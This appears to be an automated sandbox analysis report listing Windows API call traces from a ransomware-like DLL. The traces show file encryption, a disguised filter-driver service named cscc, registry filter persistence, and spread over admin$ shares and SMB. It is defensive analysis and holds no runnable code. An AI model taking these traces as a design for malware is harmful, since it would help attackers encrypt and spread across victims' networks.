                                                                        • Part of subcall function 048568B5: GetProcessHeap.KERNEL32(00000000,?), ref: 0485699F
                                                                        • Part of subcall function 048568B5: HeapFree.KERNEL32(00000000), ref: 048569A2
                                                                      • DeleteFileW.KERNEL32(?), ref: 0485983E
                                                                      • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 04859857
                                                                      • SetLastError.KERNEL32(00000057,00000000,00000000,00000000,?,0485A0AD,00000000,00000000,00000000,00000000,04856AA8,00000000,00000000,00000000,00000024,04856AA8), ref: 04859878
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$ErrorLastService$wsprintf$FileProcess$Connection2Path$AllocCancelCloseDeleteFindFreeHandleTimememcpy$CreateExistsExtensionManagerNameOpenQuerySleepStartStatusSystemmemset
                                                                      • String ID: %08X%08X$W$\\%s\admin$$\\%ws\admin$\%ws$cscc.dat
                                                                      • API String ID: 719309661-1529897384
                                                                      • Opcode ID: a9170839c9e6b8d18ec9cd1751b613aa955b89f09be4cee25eb1a0fc04f9d53e
                                                                      • Instruction ID: d7b27d11085e722f478865265a7b9b1c082da914b008316e66b7636a6029731c
                                                                      • Opcode Fuzzy Hash: a9170839c9e6b8d18ec9cd1751b613aa955b89f09be4cee25eb1a0fc04f9d53e
                                                                      • Instruction Fuzzy Hash: EC91E9B1508345EBEB219F64D888A9BB6ECEF84304F044E2AF959D2160E774E9489F52

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • memset.MSVCRT ref: 04858B52
                                                                      • memset.MSVCRT ref: 04858B6F
                                                                      • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 04858B8F
                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 04858BA0
                                                                      • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 04858BBA
                                                                      • inet_addr.WS2_32(000001B0), ref: 04858BDF
                                                                      • inet_addr.WS2_32(000001C0), ref: 04858BF3
                                                                        • Part of subcall function 0485641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,74D65350,?,74DF0F00), ref: 04856439
                                                                        • Part of subcall function 0485641A: GetProcessHeap.KERNEL32(00000000,00000000), ref: 04856446
                                                                        • Part of subcall function 0485641A: HeapAlloc.KERNEL32(00000000), ref: 0485644D
                                                                        • Part of subcall function 0485641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 04856465
                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,000001B0), ref: 04858C24
                                                                      • HeapFree.KERNEL32(00000000), ref: 04858C2B
                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,00000200,000001B0), ref: 04858C5C
                                                                      • HeapFree.KERNEL32(00000000), ref: 04858C63
                                                                      • LocalAlloc.KERNEL32(00000040,0000000C), ref: 04858C98
                                                                      • inet_addr.WS2_32(255.255.255.255), ref: 04858CA9
                                                                      • htonl.WS2_32(?), ref: 04858CD0
                                                                      • htonl.WS2_32(?), ref: 04858CD8
                                                                      • CreateThread.KERNELBASE(00000000,00000000,04858AB3,00000000,00000000,00000000), ref: 04858CED
                                                                      • CloseHandle.KERNELBASE(?), ref: 04858D17
                                                                      • LocalFree.KERNEL32(?), ref: 04858D28
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocFreeLocalProcessinet_addr$AdaptersByteCharInfoMultiWidehtonlmemset$CloseCreateHandleThread
                                                                      • String ID: 255.255.255.255
                                                                      • API String ID: 698255058-2422070025
                                                                      • Opcode ID: 82b6f02e21e083d5bd3e3d442f95d802d31c2b2e4d836bc30babeb921d8eed84
                                                                      • Instruction ID: b154985bccba7091aa06fd8a73636da6dfb6ffbde47d73676e2374d6e51ee0f3
                                                                      • Opcode Fuzzy Hash: 82b6f02e21e083d5bd3e3d442f95d802d31c2b2e4d836bc30babeb921d8eed84
                                                                      • Instruction Fuzzy Hash: 9C517E71904306AFD710EF64D88496BBBE9FB88350F108E2EFD85D7110D778E9598B92

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,00000014), ref: 04857025
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 04857028
                                                                      • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 0485703C
                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 04857051
                                                                      • CreateNamedPipeW.KERNELBASE(?,00000003,00000006,00000001,00000000,00000000,00000000,0000000C), ref: 0485706F
                                                                      • ConnectNamedPipe.KERNELBASE(00000000,00000000), ref: 0485707F
                                                                      • PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 0485709F
                                                                      • Sleep.KERNELBASE(000003E8), ref: 048570B3
                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 048570C4
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 048570C7
                                                                      • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 048570E2
                                                                      • StrChrW.SHLWAPI(00000000,0000003A), ref: 048570F7
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04857114
                                                                      • HeapFree.KERNEL32(00000000), ref: 04857117
                                                                      • FlushFileBuffers.KERNEL32(?), ref: 04857120
                                                                      • DisconnectNamedPipe.KERNEL32(?), ref: 04857129
                                                                      • CloseHandle.KERNEL32(?), ref: 04857132
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$NamedPipe$Process$AllocDescriptorFileSecurity$BuffersCloseConnectCreateDaclDisconnectFlushFreeHandleInitializePeekReadSleep
                                                                      • String ID:
                                                                      • API String ID: 1225799970-0
                                                                      • Opcode ID: 61e88e7fca104c0b0ff20fb7e31bc66b52f2a5c69d109590005bd53ea408f518
                                                                      • Instruction ID: 28d9032a784f24b584c0ebeea1a8855a25c19dcbffcc60cd6bb575f2f6319381
                                                                      • Opcode Fuzzy Hash: 61e88e7fca104c0b0ff20fb7e31bc66b52f2a5c69d109590005bd53ea408f518
                                                                      • Instruction Fuzzy Hash: 24416271A40214BBDB217BA1DC49EAFBFBDEF45791F008914FD05E60A0D7789A40DAA1

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSystemInfo.KERNELBASE(?,00000000,?,00000000,?,?,?,?,?,?,?,?,04855E4C,?,?,00000000), ref: 04855BE3
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04855C14
                                                                      • MapViewOfFile.KERNELBASE(00000000,00000006,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04855C39
                                                                      • CryptDuplicateHash.ADVAPI32(FF0975E4,00000000,00000000,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04855C5D
                                                                      • CryptHashData.ADVAPI32(00000000,00000000,00000004,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04855C75
                                                                      • LocalAlloc.KERNEL32(00000040,15FF4877,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04855C8B
                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04855CA4
                                                                      • memcpy.MSVCRT(-00000004,?,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04855CB8
                                                                      • FlushViewOfFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,04855E4C,?,?), ref: 04855CDC
                                                                      • LocalFree.KERNEL32(?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04855CE8
                                                                      • CryptDestroyHash.ADVAPI32(00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04855CF1
                                                                      • UnmapViewOfFile.KERNEL32(?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04855CFA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: CryptHash$FileView$Local$AllocDataDestroyDuplicateFlushFreeInfoParamSystemUnmapUnothrow_t@std@@@__ehfuncinfo$??2@memcpy
                                                                      • String ID: encrypted
                                                                      • API String ID: 3326259677-1467498611
                                                                      • Opcode ID: 8244ba5d1199b06a09c1d1dc3bb6f140da0670ad3da7c0b57135447387fbd220
                                                                      • Instruction ID: f2da9084e3b159790d0ff52c106a94db3812280469ea3b4edb42876d56913646
                                                                      • Opcode Fuzzy Hash: 8244ba5d1199b06a09c1d1dc3bb6f140da0670ad3da7c0b57135447387fbd220
                                                                      • Instruction Fuzzy Hash: F841F7B1A00209BFDB01DF68DD88EAE7BF9FB44344F018525BD05E7250DB75AE148BA0

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,00000000,04855414,00000000,?,0BADF00D,?,?,?,?,0485943A,?), ref: 04851CBD
                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,?,0485943A,?), ref: 04851CC6
                                                                      • GetProcessHeap.KERNEL32(00000008,00000033,?,?,?,?,0485943A,?), ref: 04851CD7
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,0485943A,?), ref: 04851CDA
                                                                      • htons.WS2_32(0000002F), ref: 04851CF7
                                                                      • send.WS2_32(00000033,00000000,00000033,00000000), ref: 04851D26
                                                                      • recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 04851D3D
                                                                        • Part of subcall function 04851747: GetProcessHeap.KERNEL32(00000008,?,00000000,?,00000000,04851C7A,00000000,?,00000000,00000000,?,?,00000003,00000000,?,00000000), ref: 04851783
                                                                        • Part of subcall function 04851747: HeapAlloc.KERNEL32(00000000), ref: 0485178C
                                                                        • Part of subcall function 04851747: CharUpperW.USER32(00000000), ref: 048517B2
                                                                        • Part of subcall function 04851747: GetProcessHeap.KERNEL32(00000008,00000086), ref: 048517DA
                                                                        • Part of subcall function 04851747: HeapAlloc.KERNEL32(00000000), ref: 048517DD
                                                                        • Part of subcall function 04851747: htons.WS2_32(00000082), ref: 04851801
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,0485943A,?), ref: 04851DA8
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,?,0485943A,?), ref: 04851DAF
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,0485943A,?), ref: 04851DBA
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,?,0485943A,?), ref: 04851DC1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Alloc$Freehtons$AllocateCharUpperrecvsend
                                                                      • String ID: NT LM 0.12$x
                                                                      • API String ID: 30026595-3673895198
                                                                      • Opcode ID: 6829b181f746045b2574a3885c1e051bff71cd986f06fdfa0039e17c1f6596bb
                                                                      • Instruction ID: a2c96bfefd29edf453321afaf4770e159efe8a9806bd3ad9a97ddcf128ac400f
                                                                      • Opcode Fuzzy Hash: 6829b181f746045b2574a3885c1e051bff71cd986f06fdfa0039e17c1f6596bb
                                                                      • Instruction Fuzzy Hash: 9F319E32D00305BBEF129FE8DC48B9A7FB9EF45350F058855FE48AA1A1DB79A905CB50

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • CryptDuplicateKey.ADVAPI32(?,00000000,00000000,?,00000000,?,00000000), ref: 04855D2A
                                                                      • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 04855D46
                                                                      • GetFileSizeEx.KERNEL32(00000000,?), ref: 04855D60
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04855D8D
                                                                      • CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,?,00000000), ref: 04855DBC
                                                                      • MapViewOfFile.KERNELBASE(?,00000006,00000000,00000000,?,00000000,?,?,?,00000010,?), ref: 04855DFD
                                                                      • CryptEncrypt.ADVAPI32(?,00000000,?,00000000,00000000,?,?), ref: 04855E1A
                                                                      • FlushViewOfFile.KERNEL32(?,?), ref: 04855E2C
                                                                      • UnmapViewOfFile.KERNEL32(?), ref: 04855E35
                                                                      • CloseHandle.KERNEL32(?,00000000,?,?,?,00000010,?), ref: 04855E54
                                                                      • CloseHandle.KERNEL32(?), ref: 04855E71
                                                                      • CryptDestroyKey.ADVAPI32(?), ref: 04855E7F
                                                                      • SetEvent.KERNEL32(?), ref: 04855E92
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: File$CryptView$CloseCreateHandle$DestroyDuplicateEncryptEventFlushMappingSizeUnmapUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID:
                                                                      • API String ID: 799083214-0
                                                                      • Opcode ID: c4057e4e5d3e47fc9c44a0fc791595d3e400d54cfbf63f4eca296a5f39f738ad
                                                                      • Instruction ID: 6badd6785b0af2a667d451fad2436385a9b606523455c8ef6e1da548c4b79269
                                                                      • Opcode Fuzzy Hash: c4057e4e5d3e47fc9c44a0fc791595d3e400d54cfbf63f4eca296a5f39f738ad
                                                                      • Instruction Fuzzy Hash: D8514972900219BBDF119FA5DC48AEFBFB9EF08750F048925FD05E2160D775AA40DBA0

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • FindResourceW.KERNEL32(?,00000006,00000000,?), ref: 0485832A
                                                                      • LoadResource.KERNEL32(00000000), ref: 04858341
                                                                      • LockResource.KERNEL32(00000000), ref: 04858350
                                                                      • SizeofResource.KERNEL32(00000000), ref: 04858368
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 04858384
                                                                      • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0485838D
                                                                      • memcpy.MSVCRT(00000000,00000002,?,?,00000002), ref: 0485839C
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000002), ref: 048583B9
                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,00000002), ref: 048583BC
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00000004,?,?,?,?,00000002), ref: 048583FE
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,00000002), ref: 04858401
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000002), ref: 0485840A
                                                                      • RtlFreeHeap.NTDLL(00000000,?,?,?,00000002), ref: 0485840D
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$ProcessResource$AllocateFree$FindLoadLockSizeofmemcpy
                                                                      • String ID:
                                                                      • API String ID: 3010137425-0
                                                                      • Opcode ID: 9c0b75511a2a569877ad42632365a3c59ae2ae61994c2e0cca8b91c48014fe88
                                                                      • Instruction ID: 87918ef810d0fbe8b343ace5540112642cbfbeb032f9b17d5795c0a3a3d7a6b7
                                                                      • Opcode Fuzzy Hash: 9c0b75511a2a569877ad42632365a3c59ae2ae61994c2e0cca8b91c48014fe88
                                                                      • Instruction Fuzzy Hash: C4315C71900205ABDB11AFA9DC48FAB7FACEF45355F008A15FD05D7290EB38E924CBA1

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSystemInfo.KERNELBASE(?,00000000,?,?,?,?,?,?,04855DE8,00000000,?,?,?,00000010,?), ref: 04855A92
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04855AC3
                                                                      • MapViewOfFile.KERNELBASE(00000010,00000004,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04855AEA
                                                                      • CryptDuplicateHash.ADVAPI32(?,00000000,00000000,00000010,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04855B32
                                                                      • CryptHashData.ADVAPI32(00000010,00000010,00000004,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04855B49
                                                                      • LocalAlloc.KERNEL32(00000040,?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04855B5F
                                                                      • CryptGetHashParam.ADVAPI32(00000010,00000002,00000000,?,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04855B77
                                                                      • LocalFree.KERNEL32(00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04855B99
                                                                      • CryptDestroyHash.ADVAPI32(00000010,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04855BA2
                                                                      • UnmapViewOfFile.KERNEL32(00000010,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04855BB4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: CryptHash$FileLocalView$AllocDataDestroyDuplicateFreeInfoParamSystemUnmapUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID: encrypted
                                                                      • API String ID: 569730286-1467498611
                                                                      • Opcode ID: f569dc38f505cf0044b4b127df6f8f6b33419e26292d22d78b667400754c26f1
                                                                      • Instruction ID: 33e0427f761d271546ec03ad04c25227d045515c76ea724ead2798532028c285
                                                                      • Opcode Fuzzy Hash: f569dc38f505cf0044b4b127df6f8f6b33419e26292d22d78b667400754c26f1
                                                                      • Instruction Fuzzy Hash: 994150B2600209AFEB04DF74DC88AAA7BA9FB44354F058529FD05E7250DB75ED45CBA0
                                                                      APIs
                                                                      • OpenSCManagerW.SECHOST(00000000,00000000,000F003F,00000000,?,cscc,?,0485154F,00000000,048511D0,?,?,?), ref: 04851377
                                                                      • GetLastError.KERNEL32(?,0485154F,00000000,048511D0,?,?,?), ref: 04851383
                                                                      • CreateServiceW.ADVAPI32(00000000,cscc,Windows Client Side Caching DDriver,000F01FF,00000001,00000000,00000003,cscc.dat,Filter,00000000,FltMgr,00000000,00000000,?,?,0485154F), ref: 048513B6
                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,0485154F,00000000,048511D0,?,?,?), ref: 048513DB
                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,0485154F,00000000,048511D0,?,?,?), ref: 048513DE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Service$CloseHandle$CreateErrorLastManagerOpen
                                                                      • String ID: Filter$FltMgr$Windows Client Side Caching DDriver$cscc$cscc.dat
                                                                      • API String ID: 2226085316-2908389127
                                                                      • Opcode ID: 859a3bbbe9d11e4217626a866dbe1d245fe604a83e6b96e3d1225ad07c57eb37
                                                                      • Instruction ID: ed2b8db5f5306e84dd0b6fcb3eef22bca51b690f41186cfe47acdd6e7cf97ea9
                                                                      • Opcode Fuzzy Hash: 859a3bbbe9d11e4217626a866dbe1d245fe604a83e6b96e3d1225ad07c57eb37
                                                                      • Instruction Fuzzy Hash: 2501A731B82324BBC361ABA5AC4DD9F7E9CDB06BA1B000D51BD06E3600C5FC6900CEA4
                                                                      APIs
                                                                      • GetVersion.KERNEL32(SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318},UpperFilters,SYSTEM\CurrentControlSet\Control\Class\{71A27CDD-812A-11D0-BEC7-08002BE2092F},LowerFilters,00000000,048511D0,?,?,?), ref: 04851588
                                                                      Strings
                                                                      • SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318}, xrefs: 04851578
                                                                      • DumpFilters, xrefs: 04851592
                                                                      • cscc, xrefs: 0485153A
                                                                      • UpperFilters, xrefs: 04851573
                                                                      • cscc, xrefs: 04851533
                                                                      • SYSTEM\CurrentControlSet\Control\CrashControl, xrefs: 04851597
                                                                      • LowerFilters, xrefs: 0485155E
                                                                      • SYSTEM\CurrentControlSet\Control\Class\{71A27CDD-812A-11D0-BEC7-08002BE2092F}, xrefs: 04851563
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Version
                                                                      • String ID: DumpFilters$LowerFilters$SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318}$SYSTEM\CurrentControlSet\Control\Class\{71A27CDD-812A-11D0-BEC7-08002BE2092F}$SYSTEM\CurrentControlSet\Control\CrashControl$UpperFilters$cscc$cscc
                                                                      • API String ID: 1889659487-625840244
                                                                      • Opcode ID: 31f53beebec6da3b8be4eef901751fcf35c7ccce0985271ee3380550b9f3eb3b
                                                                      • Instruction ID: 89ca159c2e757f60d94bdcd0d2894ca32c4e1495675d20b87de936d3aa9f06d9
                                                                      • Opcode Fuzzy Hash: 31f53beebec6da3b8be4eef901751fcf35c7ccce0985271ee3380550b9f3eb3b
                                                                      • Instruction Fuzzy Hash: 29F08922FC1722171BF276ECA81DB5940815E02B5A7050F90EC43F7B21EEECFE408696
                                                                      APIs
                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 048562A5
                                                                      • LocalFree.KERNEL32(?), ref: 0485635D
                                                                        • Part of subcall function 04855507: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,00000000,?,048562C3,?), ref: 04855520
                                                                        • Part of subcall function 04855507: GetLastError.KERNEL32(?,048562C3,?), ref: 04855528
                                                                        • Part of subcall function 04855507: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008,?,048562C3,?), ref: 0485553E
                                                                      • CloseHandle.KERNEL32(?,?), ref: 04856348
                                                                        • Part of subcall function 04855613: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 04855636
                                                                        • Part of subcall function 04855613: LocalAlloc.KERNEL32(00000040,?,00000000), ref: 0485564C
                                                                        • Part of subcall function 04855613: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 04855662
                                                                        • Part of subcall function 04855613: CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 04855682
                                                                        • Part of subcall function 04855613: LocalAlloc.KERNEL32(00000040,?), ref: 0485568D
                                                                        • Part of subcall function 04855613: CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 048556A6
                                                                        • Part of subcall function 04855613: CryptImportPublicKeyInfo.CRYPT32(?,00000001,00000000,?), ref: 048556B5
                                                                        • Part of subcall function 04855613: LocalFree.KERNEL32(00000000), ref: 048556BF
                                                                        • Part of subcall function 04855613: LocalFree.KERNEL32(?), ref: 048556C8
                                                                      • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?), ref: 0485633F
                                                                        • Part of subcall function 04856085: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,?,00000000,?,?,?,048562E0,?,?,?,?), ref: 048560A6
                                                                        • Part of subcall function 04856085: CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,?,048562E0,?,?,?,?), ref: 048560BA
                                                                        • Part of subcall function 04856085: CryptDeriveKey.ADVAPI32(?,0000660E,?,00000001,?,?,?,?,048562E0,?,?,?,?), ref: 048560D3
                                                                        • Part of subcall function 04856085: CryptDestroyHash.ADVAPI32(?,?,?,?,048562E0,?,?,?,?), ref: 048560DF
                                                                      • CryptDestroyKey.ADVAPI32(?,?,?,?,?), ref: 04856336
